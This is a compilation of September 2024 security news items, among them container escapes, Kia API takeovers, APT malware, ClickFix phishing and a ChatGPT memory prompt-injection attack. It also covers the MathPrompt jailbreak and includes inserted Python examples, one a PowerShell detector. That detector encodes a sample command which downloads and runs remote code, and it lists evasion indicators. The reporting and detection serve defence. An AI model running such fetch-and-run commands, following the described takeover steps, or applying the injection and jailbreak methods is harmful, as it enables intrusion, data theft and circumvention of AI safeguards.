Cloud security firm Wiz, which discovered and reported the flaw to NVIDIA on September 1, 2024, said it would allow an attacker who controls the container images run by the Toolkit to perform a container escape and gain full access to the underlying host.
In a hypothetical attack scenario, a threat actor could weaponize the shortcoming by creating a rogue container image that, when run on the target platform either directly or indirectly, grants them full access to the file system.
This could materialize in the form of a supply chain attack where the victim is tricked into running the malicious image, or, alternatively, via services that allow shared GPU resources.
"With this access, the attacker can now reach the Container Runtime Unix sockets (docker.sock/containerd.sock)," security researchers Shir Tamari, Ronen Shustin, and Andres Riancho said.
"These sockets can be used to execute arbitrary commands on the host system with root privileges, effectively taking control of the machine."
The problem poses a severe risk to orchestrated, multi-tenant environments, as it could permit an attacker to escape the container and obtain access to data and secrets of other applications running on the same node, and even the same cluster.
Technical aspects of the attack have been withheld at this stage to prevent exploitation efforts. It's highly recommended that users take steps to apply the patches to safeguard against potential threats.
"While the hype concerning AI security risks tends to focus on futuristic AI-based attacks, 'old-school' infrastructure vulnerabilities in the ever-growing AI tech stack remain the immediate risk that security teams should prioritize and protect against," the researchers said.
Hackers Could Have Remotely Controlled Kia Cars Using Only License Plates
26.9.24 Exploit The Hacker News
Cybersecurity researchers have disclosed a set of now patched vulnerabilities in Kia vehicles that, if successfully exploited, could have allowed remote control over key functions using nothing more than a license plate.
"These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription," security researchers Neiko Rivera, Sam Curry, Justin Rhinehart, and Ian Carroll said.
The issues impact almost all vehicles made after 2013, even letting attackers covertly gain access to sensitive information including the victim's name, phone number, email address, and physical address.
Essentially, this could then be abused by the adversary to add themselves as an "invisible" second user on the car without the owner's knowledge.
The crux of the research is that the issues exploit the Kia dealership infrastructure ("kiaconnect.kdealer[.]com") used for vehicle activations to register for a fake account via an HTTP request and then generate access tokens.
The token is subsequently used in conjunction with another HTTP request to a dealer APIGW endpoint and the vehicle identification number (VIN) of a car to obtain the vehicle owner's name, phone number, and email address.
What's more, the researchers found that it's possible to gain access to a victim's vehicle as trivially as issuing four HTTP requests, and ultimately to execute internet-to-vehicle commands -
Generate the dealer token and retrieve the "token" header from the HTTP response using the aforementioned method
Fetch victim's email address and phone number
Modify the owner's existing access using the leaked email address and VIN to add the attacker as the primary account holder
Add attacker to victim vehicle by adding an email address under their control as the primary owner of the vehicle, thereby allowing for running arbitrary commands
"From the victim's side, there was no notification that their vehicle had been accessed nor their access permissions modified," the researchers pointed out.
"An attacker could resolve someone's license plate, enter their VIN through the API, then track them passively and send active commands like unlock, start, or honk."
In a hypothetical attack scenario, a bad actor could enter the license plate of a Kia vehicle in a custom dashboard, retrieve the victim's information, and then execute commands on the vehicle after around 30 seconds.
Following responsible disclosure in June 2024, the flaws were addressed by Kia as of August 14, 2024. There is no evidence that these vulnerabilities were ever exploited in the wild.
"Cars will continue to have vulnerabilities, because in the same way that Meta could introduce a code change which would allow someone to take over your Facebook account, car manufacturers could do the same for your vehicle," the researchers said.
N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks
26.9.24 APT The Hacker News
Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy.
The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima.
"These samples enhance Sparkling Pisces' already extensive arsenal and demonstrate the group's continuous evolution and increasing capabilities," Palo Alto Networks Unit 42 researchers Daniel Frank and Lior Rochberger said.
Active since at least 2012, the threat actor has been called the "king of spear phishing" for its ability to trick victims into downloading malware by sending emails that make it seem like they are from trusted parties.
Unit 42's analysis of Sparkling Pisces' infrastructure has uncovered two new portable executables referred to as KLogEXE and FPSpy.
KLogEXE is a C++ version of the PowerShell-based keylogger named InfoKey that was highlighted by JPCERT/CC in connection with a Kimsuky campaign targeting Japanese organizations.
The malware comes equipped with capabilities to collect and exfiltrate information about the applications currently running on the compromised workstation, keystrokes typed, and mouse clicks.
On the other hand, FPSpy is said to be a variant of the backdoor that AhnLab disclosed in 2022, with overlaps identified with malware that Cybereason documented under the name KGH_SPY in late 2020.
FPSpy, in addition to keylogging, is also engineered to gather system information, download and execute more payloads, run arbitrary commands, and enumerate drives, folders, and files on the infected device.
Unit 42 said it was also able to identify points of similarity in the source code of both KLogEXE and FPSpy, suggesting that they are likely the work of the same author.
"Most of the targets we observed during our research originated from South Korea and Japan, which is congruent with previous Kimsuky targeting," the researchers said.
Watering Hole Attack on Kurdish Sites Distributing Malicious APKs and Spyware
26.9.24 Virus The Hacker News
As many as 25 websites linked to the Kurdish minority have been compromised as part of a watering hole attack designed to harvest sensitive information for over a year and a half.
French cybersecurity firm Sekoia, which disclosed details of the campaign dubbed SilentSelfie, described the intrusion set as long-running, with first signs of infection detected as far back as December 2022.
The strategic web compromises are designed to deliver four different variants of an information-stealing framework, it added.
"These ranged from the simplest, which merely stole the user's location, to more complex ones that recorded images from the selfie camera and led selected users to install a malicious APK, i.e., an application used on Android," security researchers Felix Aimé and Maxime A said in a Wednesday report.
Targeted websites include Kurdish press and media, Rojava administration and its armed forces, those related to revolutionary far-left political parties and organizations in Türkiye and Kurdish regions. Sekoia told The Hacker News that the exact method by which these websites were breached in the first place remains uncertain.
The attacks have not been attributed to any known threat actor or entity, indicating the emergence of a new threat cluster targeting the Kurdish community, which has been previously singled out by groups like StrongPity and BladeHawk.
Earlier this year, Dutch security firm Hunt & Hackett also revealed that Kurdish websites in the Netherlands were singled out by a Türkiye-nexus threat actor known as Sea Turtle.
The watering hole attacks are characterized by the deployment of a malicious JavaScript that's responsible for gathering various kinds of information from site visitors, including their location, device data (e.g., number of CPUs, battery status, browser language, etc.), and public IP address, among others.
One variant of the reconnaissance script found on three websites (rojnews[.]news, hawarnews[.]com, and targetplatform[.]net) has also been observed redirecting users to rogue Android APK files, while some others include the ability for user tracking via a cookie named "sessionIdVal."
The Android app, per Sekoia's analysis, embeds the website itself as a WebView, while also clandestinely hoovering up system information, contact lists, location, and files present in the external storage, based on the permissions granted to it.
"It is worth noting that this malicious code doesn't have any persistence mechanism but is only executed when the user opens the RojNews application," the researchers pointed out.
"Once the user opens the application, and after 10 seconds, the LocationHelper service starts beaconing in the background to the URL rojnews[.]news/wp-includes/sitemaps/ via HTTP POST requests, sharing the current location of the user and waiting for commands to execute."
Not much is known about who is behind SilentSelfie, but Sekoia has assessed that it could be the handiwork of the Kurdistan Regional Government of Iraq based on the arrest of RojNews journalist Silêman Ehmed by KDP forces in October 2023. He was sentenced to three years in prison in July 2024.
"Even though this watering hole campaign is of low sophistication, it is notable for the number of Kurdish websites affected and its duration," the researchers said. "The campaign's low level of sophistication suggests it might be the work of an uncovered threat actor with limited capabilities and relatively new to the field."
Cloudflare Warns of India-Linked Hackers Targeting South and East Asian Entities
26.9.24 APT The Hacker News
An advanced threat actor with an India nexus has been observed using multiple cloud service providers to facilitate credential harvesting, malware delivery, and command-and-control (C2).
Web infrastructure and security company Cloudflare is tracking the activity under the name SloppyLemming, which is also called Outrider Tiger and Fishing Elephant.
"Between late 2022 to present, SloppyLemming has routinely used Cloudflare Workers, likely as part of a broad espionage campaign targeting South and East Asian countries," Cloudflare said in an analysis.
SloppyLemming is assessed to be active since at least July 2021, with prior campaigns leveraging malware such as Ares RAT and WarHawk, the latter of which is also linked to a known hacking crew called SideWinder. The use of Ares RAT, on the other hand, has been linked to SideCopy, a threat actor likely of Pakistani origin.
Targets of SloppyLemming's activity span government, law enforcement, energy, education, telecommunications, and technology entities located in Pakistan, Sri Lanka, Bangladesh, China, Nepal, and Indonesia.
The attack chains involve sending spear-phishing emails to targets that aim to trick recipients into clicking on a malicious link by inducing a false sense of urgency, claiming that they need to complete a mandatory process within the next 24 hours.
Clicking on the URL takes the victim to a credential harvesting page, which then serves as a mechanism for the threat actor to gain unauthorized access to targeted email accounts within organizations that are of interest.
"The actor uses a custom-built tool named CloudPhish to create a malicious Cloudflare Worker to handle the credential logging logic and exfiltration of victim credentials to the threat actor," the company said.
Some of the attacks undertaken by SloppyLemming have leveraged similar techniques to capture Google OAuth tokens, as well as employ booby-trapped RAR archives ("CamScanner 06-10-2024 15.29.rar") that likely exploit a WinRAR flaw (CVE-2023-38831) to achieve remote code execution.
Present within the RAR file is an executable that, besides displaying the decoy document, stealthily loads "CRYPTSP.dll," which serves as a downloader to retrieve a remote access trojan hosted on Dropbox.
It's worth mentioning here that cybersecurity company SEQRITE detailed an analogous campaign undertaken by the SideCopy actors last year targeting Indian government and defense sectors to distribute the Ares RAT using ZIP archives named "DocScanner_AUG_2023.zip" and "DocScanner-Oct.zip" that are engineered to trigger the same vulnerability.
A third infection sequence employed by SloppyLemming entails using spear-phishing lures to lead prospective targets to a phony website that impersonates the Punjab Information Technology Board (PITB) in Pakistan, after which they are redirected to another site that contains an internet shortcut (URL) file.
The URL file comes embedded with code to download another file, an executable named PITB-JR5124.exe, from the same server. The binary is a legitimate file that's used to sideload a rogue DLL named profapi.dll that subsequently communicates with a Cloudflare Worker.
These Cloudflare Worker URLs, the company noted, act as an intermediary, relaying requests to the actual C2 domain used by the adversary ("aljazeerak[.]online").
Cloudflare said it "observed concerted efforts by SloppyLemming to target Pakistani police departments and other law enforcement organizations," adding "there are indications that the actor has targeted entities involved in the operation and maintenance of Pakistan's sole nuclear power facility."
Some of the other targets of credential harvesting activity encompass Sri Lankan and Bangladeshi government and military organizations, and to a lesser extent, Chinese energy and academic sector entities.
Chinese Hackers Infiltrate U.S. Internet Providers in Cyber Espionage Campaign
26.9.24 APT The Hacker News
Nation-state threat actors backed by Beijing broke into a "handful" of U.S. internet service providers (ISPs) as part of a cyber espionage campaign orchestrated to glean sensitive information, The Wall Street Journal reported Wednesday.
The activity has been attributed to a threat actor that Microsoft tracks as Salt Typhoon, which is also known as FamousSparrow and GhostEmperor.
"Investigators are exploring whether the intruders gained access to Cisco Systems routers, core network components that route much of the traffic on the internet," the publication was quoted as saying, citing people familiar with the matter.
The end goal of the attacks is to gain a persistent foothold within target networks, allowing the threat actors to harvest sensitive data or launch a damaging cyber attack.
GhostEmperor first came to light in October 2021, when Russian cybersecurity company Kaspersky detailed a long-standing evasive operation targeting Southeast Asian targets in order to deploy a rootkit named Demodex.
Targets of the campaign included high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan.
As recently as July 2024, Sygnia revealed that an unnamed client was compromised by the threat actor in 2023 to infiltrate one of its business partner's networks.
"During the investigation, several servers, workstations, and users were found to be compromised by a threat actor who deployed various tools to communicate with a set of [command-and-control] servers," the company said. "One of these tools was identified as a variant of Demodex."
The development comes days after the U.S. government said it disrupted a 260,000-device botnet dubbed Raptor Train controlled by a different Beijing-linked hacking crew called Flax Typhoon.
It also represents the latest in a string of Chinese state-sponsored efforts to target telecom, ISPs, and other critical infrastructure sectors.
Google's Shift to Rust Programming Cuts Android Memory Vulnerabilities by 52%
25.9.24 Vulnerability The Hacker News
Google has revealed that its transition to memory-safe languages such as Rust as part of its secure-by-design approach has led to the percentage of memory safety vulnerabilities discovered in Android dropping from 76% to 24% over a period of six years.
The tech giant said focusing on Safe Coding for new features not only reduces the overall security risk of a codebase, but also makes the switch more "scalable and cost-effective."
Eventually, this leads to a drop in memory safety vulnerabilities as new memory unsafe development slows down after a certain period of time, and new memory safe development takes over, Google's Jeff Vander Stoep and Alex Rebert said in a post shared with The Hacker News.
Perhaps even more interestingly, the number of memory safety vulnerabilities can also drop notwithstanding an increase in the quantity of new memory unsafe code.
The paradox is explained by the fact that vulnerabilities decay exponentially, with a study finding that a high number of vulnerabilities often reside in new or recently modified code.
"The problem is overwhelmingly with new code, necessitating a fundamental change in how we develop code," Vander Stoep and Rebert noted. "Code matures and gets safer with time, exponentially, making the returns on investments like rewrites diminish over time as code gets older."
Google, which formally announced its plans to support the Rust programming language in Android way back in April 2021, said it began prioritizing transitioning new development to memory-safe languages around 2019.
As a result, the number of memory safety vulnerabilities discovered in the operating system has declined from 223 in 2019 to less than 50 in 2024.
It also goes without saying that much of the decrease in such flaws is down to advancements in the ways devised to combat them, moving from reactive patching to proactive mitigation to proactive vulnerability discovery using tools like Clang sanitizers.
The tech giant further noted that memory safety strategies should evolve even more to prioritize "high-assurance prevention" by incorporating secure-by-design principles that enshrine security into the very foundations.
"Instead of focusing on the interventions applied (mitigations, fuzzing), or attempting to use past performance to predict future security, Safe Coding allows us to make strong assertions about the code's properties and what can or cannot happen based on those properties," Vander Stoep and Rebert said.
That's not all. Google said it is also focusing on offering interoperability between Rust, C++, and Kotlin, instead of code rewrites, as a "practical and incremental approach" to embracing memory-safe languages and ultimately eliminating entire vulnerability classes.
"Adopting Safe Coding in new code offers a paradigm shift, allowing us to leverage the inherent decay of vulnerabilities to our advantage, even in large existing systems," it said.
"The concept is simple: once we turn off the tap of new vulnerabilities, they decrease exponentially, making all of our code safer, increasing the effectiveness of security design, and alleviating the scalability challenges associated with existing memory safety strategies such that they can be applied more effectively in a targeted manner."
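To make the decay argument concrete, here is an added toy model (not code from Google's post): each year's new memory-unsafe code forms a cohort whose vulnerability yield halves with a fixed half-life, so the yearly vulnerability count falls once new unsafe development shrinks, even though the total amount of unsafe code keeps growing. The half-life, defect rate and yearly code volumes are constructed, illustrative values.

```python
"""
Added example (not from Google's post or The Hacker News): a toy model of
"vulnerability decay". Every year a cohort of new memory-unsafe code is
written; a cohort's expected vulnerability yield falls exponentially with
its age. The total unsafe codebase grows every year, yet the yearly count
of expected vulnerabilities drops once NEW unsafe code per year shrinks.
All rates and volumes are constructed, illustrative values.
"""
import math

HALF_LIFE_YEARS = 1.5        # assumed: a cohort's yield halves every 1.5 years
VULNS_PER_KLOC_YEAR0 = 0.05  # assumed: vulns found per 1k lines in the year written


def cohort_yield(kloc, age_years, half_life=HALF_LIFE_YEARS,
                 base_rate=VULNS_PER_KLOC_YEAR0):
    """Expected vulnerabilities found this year in a cohort of the given age."""
    decay = math.exp(-math.log(2) * age_years / half_life)
    return kloc * base_rate * decay


def simulate(new_unsafe_kloc_per_year):
    """
    Given yearly volumes of new memory-unsafe code (kLOC), return a list of
    (year, cumulative_unsafe_kloc, expected_vulns_found_that_year).
    """
    rows = []
    total = 0.0
    for year, kloc in enumerate(new_unsafe_kloc_per_year):
        total += kloc
        # Every cohort written so far still contributes, weighted by its age.
        vulns = sum(cohort_yield(c, year - i)
                    for i, c in enumerate(new_unsafe_kloc_per_year[:year + 1]))
        rows.append((year, total, vulns))
    return rows


# Constructed scenario: new unsafe development shrinks as new work moves to
# memory-safe languages, but never stops, so total unsafe code keeps growing.
NEW_UNSAFE_KLOC = [1000, 1000, 1000, 600, 350, 200, 120]

if __name__ == "__main__":
    for year, total, vulns in simulate(NEW_UNSAFE_KLOC):
        print(f"year {year}: unsafe code {total:7.0f} kLOC, "
              f"expected vulns {vulns:6.1f}")
```

Running it shows the count rising while unsafe development is constant, then falling from year 3 on even though the unsafe codebase is still growing.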
The development comes as Google touted increased collaboration with Arm's product security and graphics processing unit (GPU) engineering teams to flag multiple shortcomings and elevate the overall security of the GPU software/firmware stack across the Android ecosystem.
This includes the discovery of two memory issues in Pixel's customization of driver code (CVE-2023-48409 and CVE-2023-48421) and another in Arm Valhall GPU firmware and 5th Gen GPU architecture firmware (CVE-2024-0153).
"Proactive testing is good hygiene as it can lead to the detection and resolution of new vulnerabilities before they're exploited," Google and Arm said.
Mozilla Faces Privacy Complaint for Enabling Tracking in Firefox Without User Consent
25.9.24 Security The Hacker News
Vienna-based privacy non-profit noyb (short for None Of Your Business) has filed a complaint with the Austrian data protection authority (DPA) against Firefox maker Mozilla for enabling a new feature called Privacy Preserving Attribution (PPA) without explicitly seeking users' consent.
"Contrary to its reassuring name, this technology allows Firefox to track user behavior on websites," noyb said. "In essence, the browser is now controlling the tracking, rather than individual websites."
Noyb also called out Mozilla for allegedly taking a leaf out of Google's playbook by "secretly" enabling the feature by default without informing users.
PPA, which is currently enabled in Firefox version 128 as an experimental feature, has its parallels in Google's Privacy Sandbox project in Chrome.
The initiative, now abandoned by Google, sought to replace third-party tracking cookies with a set of APIs baked into the web browser that advertisers can talk to in order to determine users' interests and serve targeted ads.
Put differently, the web browser acts as a middleman that stores information about the different categories that users can be slotted into based on their internet browsing patterns.
PPA, per Mozilla, is a way for sites to "understand how their ads perform without collecting data about individual people," describing it as a "non-invasive alternative to cross-site tracking."
It's also similar to Apple's Privacy Preserving Ad Click Attribution, which allows advertisers to measure the effectiveness of their ad campaigns on the web without compromising on user privacy.
The way PPA works is as follows: Websites that serve ads can ask Firefox to remember the ads in the form of an impression that includes details about the ads themselves, such as the destination website.
If a Firefox user ends up visiting the destination website and performs an action that's deemed valuable by the business – e.g., making an online purchase by clicking on the ad, also called "conversion" – that website can prompt the browser to generate a report.
The generated report is encrypted and submitted anonymously using the Distributed Aggregation Protocol (DAP) to an "aggregation service," after which the results are combined with other similar reports to create a summary, so that it is impossible to learn too much about any individual.
This, in turn, is made possible by a mathematical framework called differential privacy that enables the sharing of aggregate information about users in a privacy-preserving manner by adding random noise to the results to prevent re-identification attacks.
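The flow just described, as an added example that is not Mozilla's code: the browser keeps impressions locally, a conversion on the destination site yields a one-hot report that is split into two additive secret shares (a simplified stand-in for DAP's split-trust aggregation; the real protocol is more involved), the two aggregators recover only the combined histogram, and Laplace noise is added for differential privacy. Site names, ad ids, the modulus and the privacy parameter are constructed values.

```python
"""
Added example (not Mozilla's code): a simplified model of PPA's
impression -> conversion -> aggregate report flow with two aggregators and
differential privacy. Simplifications and constructed values are labelled.
"""
import random

FIELD = 2**31 - 1  # constructed prime modulus for additive secret sharing


class Browser:
    """Holds impressions locally; only split, derived reports ever leave it."""

    def __init__(self, rng):
        self.rng = rng
        self.impressions = {}  # destination site -> ad id

    def record_impression(self, ad_id, destination):
        self.impressions[destination] = ad_id

    def convert(self, site, n_buckets):
        """Called by the destination site on a conversion. Returns two shares
        of a one-hot histogram (bucket = ad id), or None if no impression."""
        ad_id = self.impressions.get(site)
        if ad_id is None:
            return None
        one_hot = [1 if b == ad_id else 0 for b in range(n_buckets)]
        share_a = [self.rng.randrange(FIELD) for _ in one_hot]
        share_b = [(v - a) % FIELD for v, a in zip(one_hot, share_a)]
        return share_a, share_b


class Aggregator:
    """Sums the shares it receives; alone it sees only uniform random values."""

    def __init__(self, n_buckets):
        self.total = [0] * n_buckets

    def accept(self, share):
        self.total = [(t + s) % FIELD for t, s in zip(self.total, share)]


def combine(agg_a, agg_b):
    """Recover the exact aggregate histogram from the two aggregators."""
    return [(a + b) % FIELD for a, b in zip(agg_a.total, agg_b.total)]


def laplace_noise(rng, sensitivity, epsilon):
    # Laplace(0, sensitivity/epsilon) as the difference of two exponentials.
    rate = epsilon / sensitivity
    return rng.expovariate(rate) - rng.expovariate(rate)


def dp_histogram(exact, rng, epsilon=1.0):
    """One report changes exactly one bucket by 1, so the L1 sensitivity is 1."""
    return [count + laplace_noise(rng, 1, epsilon) for count in exact]


def run_demo(seed=7, n_buckets=3, epsilon=1.0):
    """Constructed traffic: 10 users see ad 0 or ad 2; 6 later convert."""
    rng = random.Random(seed)
    agg_a, agg_b = Aggregator(n_buckets), Aggregator(n_buckets)
    users = [Browser(rng) for _ in range(10)]
    for i, u in enumerate(users):
        u.record_impression(ad_id=0 if i < 6 else 2, destination="shop.example")
    for u in users[:4] + users[8:]:  # users 0-3 (ad 0) and 8-9 (ad 2) convert
        shares = u.convert("shop.example", n_buckets)
        if shares:
            agg_a.accept(shares[0])
            agg_b.accept(shares[1])
    exact = combine(agg_a, agg_b)  # [4, 0, 2] conversions per ad
    return exact, dp_histogram(exact, rng, epsilon)


if __name__ == "__main__":
    exact, noisy = run_demo()
    print("exact:", exact)
    print("released:", [round(v, 2) for v in noisy])
```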
"PPA is enabled in Firefox starting in version 128," Mozilla notes in a support document. "A small number of sites are going to test this and provide feedback to inform our standardization plans, and help us understand if this is likely to gain traction."
"PPA does not involve sending information about your browsing activities to anyone. Advertisers only receive aggregate information that answers basic questions about the effectiveness of their advertising."
It's this aspect that noyb has found fault with, as it's in violation of the European Union's (E.U.) stringent data protection regulations by enabling PPA by default without seeking users' permissions.
"While this may be less invasive than unlimited tracking, which is still the norm in the US, it still interferes with user rights under the E.U.'s GDPR," the advocacy group said. "In reality, this tracking option doesn't replace cookies either, but is simply an alternative - additional - way for websites to target advertising."
It further noted that a Mozilla developer justified the move by claiming that users cannot make an informed decision and that "explaining a system like PPA would be a difficult task."
"It's a shame that an organization like Mozilla believes that users are too dumb to say yes or no," Felix Mikolasch, data protection lawyer at noyb, said. "Users should be able to make a choice and the feature should have been turned off by default."
Cybersecurity Researchers Warn of New Rust-Based Splinter Post-Exploitation Tool
25.9.24 Exploit The Hacker News
Cybersecurity researchers have flagged the discovery of a new post-exploitation red team tool called Splinter in the wild.
Palo Alto Networks Unit 42 shared its findings after it discovered the program on several customers' systems.
"It has a standard set of features commonly found in penetration testing tools and its developer created it using the Rust programming language," Unit 42's Dominik Reichel said. "While Splinter is not as advanced as other well-known post-exploitation tools like Cobalt Strike, it still presents a potential threat to organizations if it is misused."
Penetration testing tools are often used for red team operations to flag potential security issues in a company's network. However, such adversary simulation tools can also be weaponized by threat actors to their advantage.
Unit 42 said it has not detected any threat actor activity associated with the Splinter tool set. There is no information as yet on who developed the tool.
The artifacts unearthed by the cybersecurity firm are "exceptionally large," coming in at around 7 MB, primarily owing to the presence of 61 Rust crates within them.
Splinter is no different than other post-exploitation frameworks in that it comes with a configuration that includes information about the command-and-control (C2) server, which is parsed in order to establish contact with the server using HTTPS.
"Splinter implants are controlled by a task-based model, which is common among post-exploitation frameworks," Reichel noted. "It obtains its tasks from the C2 server the attacker has defined."
Some of the functions of the tool include executing Windows commands, running modules via remote process injection, uploading and downloading files, collecting cloud service account info, and deleting itself from the system.
"The increasing variety underscores the importance of staying up to date on prevention and detection capabilities, since criminals are likely to adopt any techniques that are effective for compromising organizations," Reichel said.
The disclosure comes as Deep Instinct detailed two attack methods that could be exploited by threat actors to achieve stealthy code injection and privilege escalation by leveraging an RPC interface in Microsoft Office and a malicious shim, respectively.
"We applied a malicious shim in a process without registering an SDB file on the system," researchers Ron Ben-Yizhak and David Shandalov said. "We effectively bypassed EDR detection by writing to a child process and loading the target DLL from the suspended child process before any EDR hook can be established."
In July 2024, Check Point also shed light on a new process injection technique called Thread Name-Calling that allows implanting shellcode into a running process by abusing the API for thread descriptions while bypassing endpoint protection products.
"As new APIs are added to Windows, new ideas for injection techniques are appearing," security researcher Aleksandra "Hasherezade" Doniec said.
"Thread Name-Calling uses some of the relatively new APIs. However, it cannot avoid incorporating older well-known components, such as APC injections – APIs which should always be taken into consideration as a potential threat. Similarly, the manipulation of access rights within a remote process is a suspicious activity."
ChatGPT macOS Flaw Could've Enabled Long-Term Spyware via Memory Function
25.9.24 AI The Hacker News
A now-patched security vulnerability in OpenAI's ChatGPT app for macOS could have made it possible for attackers to plant long-term persistent spyware into the artificial intelligence (AI) tool's memory.
The technique, dubbed SpAIware, could be abused to facilitate "continuous data exfiltration of any information the user typed or responses received by ChatGPT, including any future chat sessions," security researcher Johann Rehberger said.
The issue, at its core, abuses a feature called memory, which OpenAI introduced earlier this February before rolling it out to ChatGPT Free, Plus, Team, and Enterprise users at the start of the month.
What it does is essentially allow ChatGPT to remember certain things across chats so that it saves users the effort of repeating the same information over and over again. Users also have the option to instruct the program to forget something.
"ChatGPT's memories evolve with your interactions and aren't linked to specific conversations," OpenAI says. "Deleting a chat doesn't erase its memories; you must delete the memory itself."
The attack technique also builds on prior findings that involve using indirect prompt injection to manipulate memories so as to remember false information, or even malicious instructions, thereby achieving a form of persistence that survives between conversations.
"Since the malicious instructions are stored in ChatGPT's memory, all new conversations going forward will contain the attacker's instructions and continuously send all chat conversation messages, and replies, to the attacker," Rehberger said.
"So, the data exfiltration vulnerability became a lot more dangerous as it now spawns across chat conversations."
In a hypothetical attack scenario, a user could be tricked into visiting a malicious site or downloading a booby-trapped document that's subsequently analyzed using ChatGPT to update the memory.
The website or the document could contain instructions to clandestinely send all future conversations to an adversary-controlled server going forward, which can then be retrieved by the attacker on the other end beyond a single chat session.
Following responsible disclosure, OpenAI has addressed the issue with ChatGPT version 1.2024.247 by closing out the exfiltration vector.
"ChatGPT users should regularly review the memories the system stores about them, for suspicious or incorrect ones and clean them up," Rehberger said.
"This attack chain was quite interesting to put together, and demonstrates the dangers of having long-term memory being automatically added to a system, both from a misinformation/scam point of view, but also regarding continuous communication with attacker controlled servers."
The disclosure comes as a group of academics has uncovered a novel AI jailbreaking technique codenamed MathPrompt that exploits large language models' (LLMs) advanced capabilities in symbolic mathematics to get around their safety mechanisms.
"MathPrompt employs a two-step process: first, transforming harmful natural language prompts into symbolic mathematics problems, and then presenting these mathematically encoded prompts to a target LLM," the researchers pointed out.
The study, upon testing against 13 state-of-the-art LLMs, found that the models respond with harmful output 73.6% of the time on average when presented with mathematically encoded prompts, as opposed to approximately 1% with unmodified harmful prompts.
It also follows Microsoft's debut of a new Correction capability that, as the name implies, allows for the correction of AI outputs when inaccuracies (i.e., hallucinations) are detected.
"Building on our existing Groundedness Detection feature, this groundbreaking capability allows Azure AI Content Safety to both identify and correct hallucinations in real-time before users of generative AI applications encounter them," the tech giant said.
Transportation Companies Hit by Cyberattacks Using Lumma Stealer and NetSupport Malware
25.9.24 Virus The Hacker News
Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a variety of information stealers and remote access trojans (RATs).
The activity cluster, per Proofpoint, makes use of compromised legitimate email accounts belonging to transportation and shipping companies so as to inject malicious content into existing email conversations.
As many as 15 breached email accounts have been identified as having been used in the campaign. It's currently not clear how these accounts are infiltrated in the first place or who is behind the attacks.
"Activity which occurred from May to July 2024 predominantly delivered Lumma Stealer, StealC, or NetSupport," the enterprise security firm said in an analysis published Tuesday.
"In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2."
The attack chains involve sending messages bearing internet shortcut (.URL) attachments or Google Drive URLs leading to a .URL file that when launched, uses Server Message Block (SMB) to fetch the next-stage payload containing the malware from a remote share.
Some variants of the campaign observed in August 2024 have also latched onto a recently popular technique called ClickFix to trick victims into downloading the DanaBot malware under the pretext of addressing an issue with displaying document content in the web browser.
Specifically, this involves urging users to copy and paste a Base64-encoded PowerShell script into the terminal, thereby triggering the infection process.
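A detection-side illustration, added here and not Proofpoint's code: decoding Base64-encoded PowerShell command lines from process-creation telemetry and triaging them, the artifact a ClickFix-style paste leaves behind. The log format, field names, the indicator list and the encoded scripts are all constructed for this example.

```python
"""
Added example (not Proofpoint's code): decode and triage -EncodedCommand
PowerShell invocations from process-creation events. Telemetry format,
indicator list and sample scripts are constructed for illustration.
"""
import base64
import re

# -EncodedCommand and its accepted abbreviations, followed by a Base64 token.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Indicators a defender would weight; deliberately not exhaustive.
INDICATORS = {
    "download": re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"),
    "invoke": re.compile(r"(?i)invoke-expression|\biex\b"),
    "evasion": re.compile(
        r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|bypass"),
}


def encode_command(script):
    """Produce what PowerShell expects after -EncodedCommand (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if the line carries no encoded command."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Score one process-creation event: decode, match indicators, assign a verdict."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"decoded": None, "hits": [], "verdict": "not-encoded"}
    outer = ENC_FLAG.sub(" ", cmdline)  # flags outside the Base64 blob
    text = outer + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if "download" in hits or "invoke" in hits:
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    # An encoded command launched straight from the desktop shell matches the
    # "paste this into Run/terminal" pattern and deserves a second look.
    if event.get("parent", "").lower() == "explorer.exe" and verdict == "benign":
        verdict = "review"
    return {"decoded": decoded, "hits": hits, "verdict": verdict}


def triage_events(events):
    return [triage(e) for e in events]


# Constructed telemetry. The first event mimics a ClickFix paste: a hidden,
# profile-less shell whose encoded body fetches and runs remote content.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_command("Get-Date")},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, triage_events(SAMPLE_EVENTS)):
        print(f"{ev['parent']:>13} -> {res['verdict']:<11} {res['hits']}")
```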
"These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management," Proofpoint said.
"The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company's operations before sending campaigns."
